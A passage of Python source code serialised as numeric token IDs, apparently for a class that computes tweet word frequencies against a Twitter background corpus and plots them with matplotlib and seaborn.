220,
220,
220,
770,
1573,
8373,
1366,
14535,
318,
7531,
2134,
286,
1393,
11,
290,
318,
198,
220,
220,
220,
8574,
287,
262,
1573,
62,
19503,
80,
62,
7568,
11688,
11,
543,
318,
257,
19798,
292,
1366,
14535,
13,
628,
220,
220,
220,
1114,
783,
262,
4469,
35789,
318,
10944,
422,
5299,
17,
13,
21,
13124,
286,
17044,
1366,
11,
198,
220,
220,
220,
49760,
546,
7724,
1510,
2456,
13,
383,
1573,
8373,
3965,
422,
428,
198,
220,
220,
220,
6291,
389,
8574,
287,
257,
8373,
6291,
2393,
326,
318,
788,
11513,
656,
198,
220,
220,
220,
257,
21015,
22155,
329,
3049,
35847,
13,
198,
220,
220,
220,
37227,
628,
220,
220,
220,
825,
2251,
62,
4775,
62,
21454,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
33687,
6126,
1366,
14535,
290,
23862,
1573,
62,
21454,
11,
543,
318,
257,
1351,
286,
477,
198,
220,
220,
220,
220,
220,
220,
220,
2456,
287,
477,
12665,
11,
351,
21025,
2288,
290,
2245,
2456,
4615,
13,
1573,
62,
21454,
198,
220,
220,
220,
220,
220,
220,
220,
318,
7763,
2641,
262,
11688,
2116,
13,
4775,
62,
21454,
13,
628,
220,
220,
220,
220,
220,
220,
220,
770,
2446,
481,
1690,
307,
1444,
7830,
1141,
1366,
15210,
11,
355,
198,
220,
220,
220,
220,
220,
220,
220,
340,
2476,
284,
307,
2266,
505,
790,
640,
617,
12665,
389,
5710,
422,
198,
220,
220,
220,
220,
220,
220,
220,
12665,
62,
7568,
13,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
923,
62,
2435,
796,
640,
13,
2435,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
38240,
1366,
14535,
12665,
5721,
284,
21015,
1351,
286,
12665,
11,
788,
4654,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
428,
1351,
1978,
656,
530,
890,
1351,
286,
2456,
198,
220,
220,
220,
220,
220,
220,
220,
12665,
62,
4868,
796,
2116,
13,
83,
732,
1039,
62,
7568,
14692,
5239,
1,
4083,
83,
349,
396,
3419,
628,
220,
220,
220,
220,
220,
220,
220,
2456,
62,
8841,
796,
366,
27071,
22179,
7,
83,
732,
1039,
62,
4868,
8,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
7575,
284,
787,
2456,
62,
8841,
25,
33172,
2835,
19510,
2435,
13,
2435,
3419,
532,
923,
62,
2435,
20679,
1899,
1539,
513,
828,
366,
1084,
1769,
1,
628,
220,
220,
220,
220,
220,
220,
220,
923,
62,
2435,
796,
640,
13,
2435,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
5765,
299,
2528,
74,
1573,
11241,
1634,
284,
2270,
1351,
656,
2456,
290,
4781,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
2245,
2456,
198,
220,
220,
220,
220,
220,
220,
220,
16326,
796,
299,
2528,
74,
13,
4775,
62,
30001,
1096,
7,
10879,
62,
8841,
8,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
7575,
284,
11241,
1096,
25,
33172,
2835,
19510,
2435,
13,
2435,
3419,
532,
923,
62,
2435,
20679,
1899,
1539,
513,
828,
366,
1084,
1769,
1,
628,
220,
220,
220,
220,
220,
220,
220,
923,
62,
2435,
796,
640,
13,
2435,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
4775,
62,
21454,
796,
685,
4775,
329,
1573,
287,
16326,
611,
1573,
407,
287,
2116,
13,
11338,
62,
10879,
60,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
7575,
284,
24061,
1573,
6131,
25,
33172,
2835,
19510,
2435,
13,
2435,
3419,
532,
923,
62,
2435,
20679,
1899,
1539,
513,
828,
366,
1084,
1769,
1,
628,
220,
220,
220,
825,
787,
62,
77,
2528,
74,
62,
15252,
62,
6738,
62,
4775,
62,
21454,
7,
944,
11,
1573,
62,
21454,
28,
14202,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
7921,
274,
299,
2528,
74,
1573,
13905,
2134,
422,
262,
1459,
1573,
62,
21454,
198,
220,
220,
220,
220,
220,
220,
220,
11688,
13,
1573,
62,
21454,
318,
1364,
355,
281,
5128,
287,
1339,
262,
2836,
3382,
284,
198,
220,
220,
220,
220,
220,
220,
220,
2251,
281,
299,
2528,
74,
2134,
351,
281,
7097,
1573,
6131,
13,
628,
220,
220,
220,
220,
220,
220,
220,
383,
749,
2219,
2446,
356,
1183,
779,
422,
428,
2134,
318,
262,
198,
220,
220,
220,
220,
220,
220,
220,
8373,
2446,
11,
1312,
13,
68,
13,
2030,
80,
62,
17080,
13,
19503,
80,
7,
4354,
828,
810,
3381,
318,
1573,
287,
198,
220,
220,
220,
220,
220,
220,
220,
1573,
6131,
13,
628,
220,
220,
220,
220,
220,
220,
220,
5765,
3601,
7,
19503,
80,
62,
17080,
8,
284,
651,
262,
1271,
286,
3748,
2456,
287,
35789,
11,
355,
198,
220,
220,
220,
220,
220,
220,
220,
880,
355,
2472,
1271,
286,
2456,
287,
35789,
13,
628,
220,
220,
220,
220,
220,
220,
220,
1680,
779,
2030,
80,
62,
17080,
13,
1712,
62,
11321,
7,
1120,
8,
284,
651,
1351,
286,
2026,
749,
2219,
2456,
198,
220,
220,
220,
220,
220,
220,
220,
290,
262,
1271,
286,
1661,
1123,
286,
606,
3568,
287,
2420,
13,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
611,
1573,
62,
21454,
318,
6045,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1573,
62,
21454,
796,
2116,
13,
4775,
62,
21454,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
19503,
80,
62,
17080,
796,
299,
2528,
74,
13,
20366,
80,
20344,
7,
944,
13,
4775,
62,
21454,
8,
628,
220,
220,
220,
825,
2251,
62,
4775,
62,
19503,
80,
62,
7568,
7,
944,
11,
1353,
62,
77,
62,
10879,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
7921,
274,
19798,
292,
1366,
14535,
1444,
1573,
62,
19503,
80,
62,
7568,
286,
262,
749,
2219,
299,
198,
220,
220,
220,
220,
220,
220,
220,
2456,
287,
35789,
11,
351,
15180,
25,
628,
220,
220,
220,
220,
220,
220,
220,
40279,
25,
703,
1690,
1123,
286,
606,
5091,
198,
220,
220,
220,
220,
220,
220,
220,
8373,
25,
1573,
8373,
287,
262,
35789,
198,
220,
220,
220,
220,
220,
220,
220,
8373,
8064,
25,
1573,
3585,
8373,
284,
4469,
198,
220,
220,
220,
220,
220,
220,
220,
2604,
8373,
8064,
25,
2604,
286,
262,
3585,
8373,
284,
4469,
3965,
198,
220,
220,
220,
220,
220,
220,
220,
4469,
62,
13966,
333,
25,
262,
1271,
286,
1661,
1573,
3568,
287,
4469,
35789,
628,
220,
220,
220,
220,
220,
220,
220,
357,
464,
2604,
318,
4465,
780,
11,
329,
1672,
11,
257,
2494,
734,
1661,
355,
1029,
355,
198,
220,
220,
220,
220,
220,
220,
220,
4469,
468,
2604,
8064,
286,
1343,
87,
11,
290,
257,
2494,
734,
1661,
2793,
621,
198,
220,
220,
220,
220,
220,
220,
220,
4469,
3965,
468,
257,
2604,
8064,
286,
532,
87,
2014,
628,
220,
220,
220,
220,
220,
220,
220,
299,
318,
262,
1271,
286,
2456,
356,
765,
284,
766,
13,
2312,
2456,
389,
3197,
287,
1502,
198,
220,
220,
220,
220,
220,
220,
220,
286,
703,
6777,
484,
389,
1043,
287,
262,
35789,
11,
523,
257,
1588,
1271,
286,
198,
220,
220,
220,
220,
220,
220,
220,
2456,
815,
307,
7147,
284,
787,
1654,
356,
1064,
262,
3499,
3392,
326,
198,
220,
220,
220,
220,
220,
220,
220,
1656,
881,
517,
1690,
621,
287,
4469,
35789,
13,
357,
1532,
257,
1573,
3568,
198,
220,
220,
220,
220,
220,
220,
220,
1690,
287,
674,
2989,
35789,
340,
743,
307,
780,
340,
635,
1656,
1690,
287,
198,
220,
220,
220,
220,
220,
220,
220,
262,
4469,
35789,
11,
543,
318,
407,
286,
1393,
2014,
628,
220,
220,
220,
220,
220,
220,
220,
383,
4036,
2456,
326,
547,
16499,
284,
2824,
262,
35789,
389,
22532,
198,
220,
220,
220,
220,
220,
220,
220,
422,
428,
1366,
14535,
357,
292,
890,
355,
2116,
13,
12947,
62,
38707,
468,
587,
900,
737,
628,
220,
220,
220,
220,
220,
220,
220,
299,
357,
600,
2599,
1271,
286,
749,
10792,
2456,
356,
765,
284,
1656,
287,
1366,
14535,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
32071,
1573,
62,
19503,
80,
62,
7568,
9313,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
51,
1124,
546,
352,
5664,
583,
8576,
2456,
1,
198,
220,
220,
220,
220,
220,
220,
220,
923,
62,
2435,
796,
640,
13,
2435,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
787,
1366,
14535,
356,
1183,
779,
287,
29353,
198,
220,
220,
220,
220,
220,
220,
220,
997,
62,
10879,
796,
1353,
62,
77,
62,
10879,
198,
220,
220,
220,
220,
220,
220,
220,
1573,
62,
69,
8897,
3976,
62,
4868,
796,
17635,
198,
220,
220,
220,
220,
220,
220,
220,
329,
1573,
11,
40279,
287,
2116,
13,
19503,
80,
62,
17080,
13,
1712,
62,
11321,
7,
22510,
62,
10879,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
5004,
1771,
1573,
3568,
287,
4469,
8633,
26,
611,
340,
857,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
407,
11,
262,
8373,
8064,
318,
900,
284,
6632,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
1573,
287,
2116,
13,
12947,
62,
38707,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2555,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
1573,
287,
2116,
13,
25249,
62,
11600,
13,
13083,
33529,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2030,
80,
62,
10366,
952,
796,
2116,
13,
19503,
80,
62,
17080,
13,
19503,
80,
7,
4775,
20679,
944,
13,
25249,
62,
11600,
58,
4775,
7131,
15,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4469,
62,
19503,
80,
796,
2116,
13,
25249,
62,
11600,
58,
4775,
7131,
15,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2604,
62,
19503,
80,
62,
10366,
952,
796,
2604,
7,
19503,
80,
62,
10366,
952,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4469,
62,
13966,
333,
796,
2116,
13,
25249,
62,
11600,
58,
4775,
7131,
16,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2030,
80,
62,
10366,
952,
796,
657,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4469,
62,
19503,
80,
796,
657,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2604,
62,
19503,
80,
62,
10366,
952,
796,
657,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4469,
62,
13966,
333,
796,
657,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
5443,
284,
787,
1351,
290,
788,
787,
1366,
14535,
287,
530,
1627,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
621,
284,
7830,
24443,
284,
281,
4683,
1366,
14535,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1573,
62,
69,
8897,
3976,
62,
4868,
13,
33295,
19510,
4775,
11,
40279,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
19503,
80,
62,
17080,
13,
19503,
80,
7,
4775,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2030,
80,
62,
10366,
952,
11,
2604,
62,
19503,
80,
62,
10366,
952,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4469,
62,
13966,
333,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
1573,
62,
19503,
80,
62,
7568,
796,
279,
67,
13,
6601,
19778,
7,
4775,
62,
69,
8897,
3976,
62,
4868,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
15180,
28,
17816,
4775,
3256,
705,
13966,
333,
34303,
3256,
705,
35324,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
43762,
8373,
3256,
705,
6404,
3585,
8373,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
25249,
40279,
6,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
7575,
284,
2251,
1573,
62,
19503,
80,
62,
7568,
25,
33172,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2835,
19510,
2435,
13,
2435,
3419,
532,
923,
62,
2435,
20679,
1899,
1539,
604,
828,
366,
1084,
1769,
1,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
4775,
62,
19503,
80,
62,
7568,
796,
1573,
62,
19503,
80,
62,
7568,
628,
220,
220,
220,
825,
2183,
62,
4775,
62,
35324,
62,
7890,
14535,
7,
944,
11,
2456,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
16766,
2163,
355,
2251,
62,
4775,
62,
19503,
80,
62,
7568,
2845,
2427,
286,
198,
220,
220,
220,
220,
220,
220,
220,
1262,
1353,
299,
2456,
422,
35789,
11,
257,
2183,
1351,
286,
2456,
318,
973,
13,
770,
198,
220,
220,
220,
220,
220,
220,
220,
2163,
5860,
262,
1366,
14535,
340,
8075,
2427,
286,
4634,
340,
284,
198,
220,
220,
220,
220,
220,
220,
220,
1573,
62,
19503,
80,
62,
7568,
13,
357,
464,
2836,
460,
24443,
644,
428,
2163,
8075,
284,
198,
220,
220,
220,
220,
220,
220,
220,
1573,
62,
19503,
80,
62,
7568,
416,
1021,
351,
279,
67,
13,
1102,
9246,
7,
7568,
16,
11,
47764,
16,
737,
8,
628,
220,
220,
220,
220,
220,
220,
220,
1052,
1672,
779,
1339,
318,
284,
779,
257,
1351,
286,
1900,
2456,
286,
1393,
284,
198,
220,
220,
220,
220,
220,
220,
220,
5678,
257,
2099,
286,
366,
4775,
15879,
1,
329,
257,
1948,
1573,
357,
18302,
31303,
198,
220,
220,
220,
220,
220,
220,
220,
262,
1573,
16499,
319,
1262,
7349,
6126,
22967,
737,
1114,
1672,
11,
329,
198,
220,
220,
220,
220,
220,
220,
220,
4819,
530,
1244,
3853,
2456,
588,
366,
43218,
1600,
366,
35739,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
366,
27727,
1,
290,
366,
33203,
774,
1,
355,
257,
900,
286,
1573,
34197,
11,
290,
788,
766,
703,
198,
220,
220,
220,
220,
220,
220,
220,
17044,
12,
325,
283,
1740,
2456,
588,
366,
19290,
274,
1600,
366,
5944,
11724,
1600,
3503,
13,
1656,
355,
1573,
198,
220,
220,
220,
220,
220,
220,
220,
30104,
1863,
777,
34197,
13,
628,
220,
220,
220,
220,
220,
220,
220,
2456,
25,
1351,
286,
2456,
284,
1234,
287,
1366,
14535,
532,
1123,
1573,
318,
257,
4731,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
628,
220,
220,
220,
220,
220,
220,
220,
1573,
62,
69,
8897,
3976,
62,
4868,
796,
17635,
198,
220,
220,
220,
220,
220,
220,
220,
2456,
796,
685,
87,
13,
12501,
1098,
7203,
40477,
12,
23,
4943,
611,
2099,
7,
87,
8,
6624,
965,
2073,
2124,
329,
2124,
287,
2456,
60,
628,
220,
220,
220,
220,
220,
220,
220,
329,
1573,
287,
2456,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
5004,
1771,
1573,
3568,
287,
1111,
4469,
8633,
290,
35789,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
611,
340,
857,
407,
11,
262,
8373,
8064,
318,
900,
284,
6632,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
1573,
287,
2116,
13,
12947,
62,
38707,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2555,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
40279,
796,
2116,
13,
19503,
80,
62,
17080,
58,
4775,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
1573,
287,
2116,
13,
25249,
62,
11600,
13,
13083,
3419,
290,
40279,
14512,
657,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2030,
80,
62,
10366,
952,
796,
2116,
13,
19503,
80,
62,
17080,
13,
19503,
80,
7,
4775,
20679,
944,
13,
25249,
62,
11600,
58,
4775,
7131,
15,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4469,
62,
19503,
80,
796,
2116,
13,
25249,
62,
11600,
58,
4775,
7131,
15,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2604,
62,
19503,
80,
62,
10366,
952,
796,
2604,
7,
19503,
80,
62,
10366,
952,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4469,
62,
13966,
333,
796,
2116,
13,
25249,
62,
11600,
58,
4775,
7131,
16,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2030,
80,
62,
10366,
952,
796,
657,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4469,
62,
19503,
80,
796,
657,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2604,
62,
19503,
80,
62,
10366,
952,
796,
657,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4469,
62,
13966,
333,
796,
657,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
5443,
284,
787,
1351,
290,
788,
787,
1366,
14535,
287,
530,
1627,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
621,
284,
7830,
24443,
284,
281,
4683,
1366,
14535,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1573,
62,
69,
8897,
3976,
62,
4868,
13,
33295,
19510,
4775,
11,
40279,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
19503,
80,
62,
17080,
13,
19503,
80,
7,
4775,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2030,
80,
62,
10366,
952,
11,
2604,
62,
19503,
80,
62,
10366,
952,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4469,
62,
13966,
333,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
1573,
62,
19503,
80,
62,
7568,
796,
279,
67,
13,
6601,
19778,
7,
4775,
62,
69,
8897,
3976,
62,
4868,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
15180,
28,
17816,
4775,
3256,
705,
13966,
333,
34303,
3256,
705,
35324,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
43762,
8373,
3256,
705,
6404,
3585,
8373,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
25249,
62,
13966,
333,
6,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
1573,
62,
19503,
80,
62,
7568,
628,
220,
220,
220,
825,
7110,
62,
4775,
62,
69,
8897,
3976,
7,
944,
11,
7110,
62,
8841,
11,
1366,
14535,
28,
14202,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
1345,
1747,
286,
1813,
1988,
546,
1573,
11,
810,
7110,
62,
8841,
318,
257,
4731,
198,
220,
220,
220,
220,
220,
220,
220,
326,
3607,
12040,
284,
307,
37515,
13,
770,
318,
655,
281,
1672,
2163,
11,
198,
220,
220,
220,
220,
220,
220,
220,
2836,
481,
765,
284,
779,
1573,
62,
19503,
80,
62,
7568,
290,
2603,
29487,
8019,
3264,
329,
517,
198,
220,
220,
220,
220,
220,
220,
220,
6496,
290,
1365,
12,
11534,
21528,
13,
628,
220,
220,
220,
220,
220,
220,
220,
5740,
326,
262,
7110,
460,
470,
3359,
28000,
1098,
3435,
9380,
11,
523,
611,
257,
198,
220,
220,
220,
220,
220,
220,
220,
1573,
3073,
588,
257,
1310,
3091,
345,
1183,
423,
284,
2834,
510,
1573,
62,
19503,
80,
62,
7568,
284,
766,
198,
220,
220,
220,
220,
220,
220,
220,
644,
262,
2095,
1682,
318,
13,
628,
220,
220,
220,
220,
220,
220,
220,
7110,
62,
8841,
357,
8841,
2599,
5721,
286,
1573,
62,
19503,
80,
62,
7568,
1366,
14535,
11,
304,
13,
70,
13,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
13966,
333,
34303,
1600,
366,
35324,
1600,
366,
43762,
8373,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
6404,
3585,
8373,
1600,
3503,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1366,
14535,
357,
79,
392,
292,
1366,
14535,
2599,
1366,
14535,
286,
262,
976,
1296,
355,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1573,
62,
19503,
80,
62,
7568,
26,
611,
1364,
6565,
788,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
4775,
62,
19503,
80,
62,
7568,
318,
37515,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
611,
1366,
14535,
318,
6045,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
14535,
796,
2116,
13,
4775,
62,
19503,
80,
62,
7568,
628,
220,
220,
220,
220,
220,
220,
220,
997,
62,
10879,
796,
18896,
7,
7890,
14535,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1949,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
14535,
13,
2617,
62,
9630,
7203,
4775,
4943,
58,
29487,
62,
8841,
4083,
29487,
13,
5657,
71,
7,
5647,
7857,
16193,
1238,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
997,
62,
10879,
14,
17,
12179,
10369,
7857,
28,
1270,
11,
3124,
2625,
66,
15341,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
458,
83,
13,
7839,
7,
29487,
62,
8841,
11,
10369,
7857,
28,
1270,
1776,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
7877,
796,
458,
83,
13,
897,
274,
9783,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
7877,
13,
87,
22704,
13,
25928,
7,
2815,
413,
5649,
28,
19,
1776,
198,
220,
220,
220,
220,
220,
220,
220,
2845,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5298,
35528,
7203,
20560,
4731,
1276,
307,
5721,
1438,
286,
1573,
62,
19503,
80,
62,
7568,
4943,
628,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
770,
373,
517,
27658,
2438,
326,
460,
307,
973,
1568,
611,
2622,
532,
329,
198,
220,
220,
220,
220,
220,
220,
220,
783,
262,
19798,
292,
4277,
29353,
2438,
318,
922,
1576,
329,
749,
4959,
628,
198,
220,
220,
220,
220,
220,
220,
220,
3013,
82,
13,
2617,
7,
7635,
2625,
21953,
25928,
4943,
198,
220,
220,
220,
220,
220,
220,
220,
997,
62,
10879,
796,
18896,
7,
944,
13,
4775,
62,
19503,
80,
62,
7568,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
20768,
1096,
262,
2603,
29487,
8019,
3785,
532,
262,
1218,
1271,
287,
3785,
3607,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
6001,
11,
428,
481,
761,
284,
4745,
319,
703,
867,
2456,
389,
3017,
287,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
3785,
198,
220,
220,
220,
220,
220,
220,
220,
277,
11,
7877,
796,
458,
83,
13,
7266,
489,
1747,
7,
5647,
7857,
16193,
1433,
11,
997,
62,
10879,
14,
17,
2014,
8,
198,
220,
220,
220,
220,
220,
220,
220,
458,
83,
13,
20760,
3378,
7,
10331,
7857,
28,
1238,
8,
198,
220,
220,
220,
220,
220,
220,
220,
458,
83,
13,
742,
3378,
7,
10331,
7857,
28,
1238,
8,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
28114,
262,
19998,
198,
220,
220,
220,
220,
220,
220,
220,
3013,
82,
13,
2617,
62,
8043,
62,
40148,
7203,
30119,
417,
4943,
198,
220,
220,
220,
220,
220,
220,
220,
3013,
82,
13,
5657,
29487,
7,
87,
28,
29487,
62,
8841,
11,
331,
2625,
4775,
1600,
1366,
28,
944,
13,
4775,
62,
19503,
80,
62,
7568,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6167,
2625,
35324,
1600,
3124,
2625,
65,
4943,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
3060,
30304,
16488,
6167,
198,
220,
220,
220,
220,
220,
220,
220,
3509,
62,
8367,
796,
2116,
13,
4775,
62,
19503,
80,
62,
7568,
13,
346,
420,
58,
15,
4083,
35324,
1303,
1064,
5415,
8373,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
4532,
16488,
284,
307,
4622,
4025,
621,
428,
3509,
8373,
198,
220,
220,
220,
220,
220,
220,
220,
7877,
13,
2617,
7,
87,
2475,
16193,
15,
11,
3509,
62,
8367,
9,
16,
13,
16,
828,
331,
18242,
2625,
1600,
2124,
18242,
2625,
26449,
8373,
4943,
198,
220,
220,
220,
220,
220,
220,
220,
7877,
13,
2617,
62,
87,
18242,
7,
29487,
62,
8841,
11,
10369,
7857,
28,
1270,
8,
198,
220,
220,
220,
220,
220,
220,
220,
7877,
13,
87,
22704,
13,
2617,
62,
18242,
62,
9150,
10786,
4852,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
7877,
13,
87,
22704,
13,
42298,
62,
4852,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
7877,
13,
42298,
62,
37266,
7,
22704,
11639,
87,
3256,
14722,
1096,
28,
1238,
8,
1303,
2546,
286,
29052,
14722,
198,
220,
220,
220,
220,
220,
